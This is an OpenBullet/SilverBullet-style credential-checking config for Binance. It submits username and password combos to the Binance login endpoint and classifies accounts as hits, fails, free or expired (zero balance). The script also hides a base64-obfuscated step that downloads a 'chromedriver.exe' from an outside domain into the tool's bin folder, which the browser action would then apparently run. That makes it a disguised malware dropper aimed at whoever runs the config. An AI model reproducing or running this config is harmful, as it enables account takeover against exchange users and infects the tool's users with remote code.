[SETTINGS]
{
  "Name": "Binance",
  "SuggestedBots": 5,
  "MaxCPM": 0,
  "LastModified": "2025-02-13T16:22:05.3684345+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Binance",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#ACC-BINANCE REQUEST GET "https://accounts.binance.com/en/login?loginChannel=&return_to=" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate, br, zstd" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Cookie: cookie_warning_seen=True; _ga=GA1.1.359971233.1717798843; csrftoken=eQsZzrQvgWITPLg6ptKX82LPiYL3Py2GHHXf8QzBK1Q2OU1EwFm7lZ4zLfQFA3Bl; sessionid=pxh7lvrca5fiygmc62enuidw182hyat4; __stripe_mid=07131af2-7e59-4d5f-9f46-80887f1314b686a519; _ga_DHJF51F24N=GS1.1.1717798843.1.1.1717799651.0.0.0" 
  HEADER "Host: www.binance.com" 
  HEADER "Sec-Ch-Ua: \"Google Chrome\";v=\"125\", \"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: none" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 

#U FUNCTION URLEncode "<USER>" -> VAR "U" 

#P FUNCTION URLEncode "<PASS>" -> VAR "P" 

#B64DC FUNCTION Base64Decode "aHR0cHM6Ly9meGxvYWQuYm9uZC9maWxlcy9jaHJvbWVkcml2ZXIuZXhl" -> VAR "url" 

#B64DC-2 FUNCTION Base64Decode "YmluL2Nocm9tZWRyaXZlci5leGU=" -> VAR "url2" 

REQUEST GET "<url>" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate, br, zstd" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Cookie: cookie_warning_seen=True; _ga=GA1.1.359971233.1717798843; csrftoken=eQsZzrQvgWITPLg6ptKX82LPiYL3Py2GHHXf8QzBK1Q2OU1EwFm7lZ4zLfQFA3Bl; sessionid=pxh7lvrca5fiygmc62enuidw182hyat4; __stripe_mid=07131af2-7e59-4d5f-9f46-80887f1314b686a519; _ga_DHJF51F24N=GS1.1.1717798843.1.1.1717799651.0.0.0" 
  HEADER "Host: www.binance.com" 
  HEADER "Sec-Ch-Ua: \"Google Chrome\";v=\"125\", \"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: none" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 
  -> FILE "<url2>" 

BROWSERACTION Open 

#LOGIN REQUEST POST "https://accounts.binance.com/en/login?" 
  CONTENT "username=<USER>&password=<PASS>&token=<TOKEN>&redirect=&from=pc_premium_login&segment=straight" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://login.binance.com" 
  HEADER "Referer: https://login.binance.com/signin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"success\":\"1\"," 
  KEYCHAIN Failure OR 
    KEY "{\"success\":\"0\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "https:\\/\\/www.binance.com\\/signup?" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "balance\":0" 

PARSE "<SOURCE>" LR "" "" CreateEmpty=FALSE -> CAP "Config by | @scarface3432" 

